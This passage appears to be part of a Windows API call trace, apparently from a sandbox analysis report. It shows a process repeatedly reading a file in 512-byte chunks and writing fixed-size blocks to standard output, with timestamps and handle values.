(_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.270] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.270] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] GetFileType (hFile=0x4c) returned 0x1 [0094.270] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.270] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, 
lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.271] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.271] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.271] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] GetFileType (hFile=0x4c) returned 0x1 [0094.271] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0094.271] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.272] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.272] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] GetFileType (hFile=0x4c) returned 0x1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, 
lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] GetFileType (hFile=0x4c) returned 0x1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] GetFileType (hFile=0x4c) returned 0x1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] GetFileType (hFile=0x4c) returned 0x1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.273] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.273] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] GetFileType (hFile=0x4c) returned 0x1 [0094.273] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=4) returned 
0x54 [0094.273] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.273] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, 
lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 
[0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
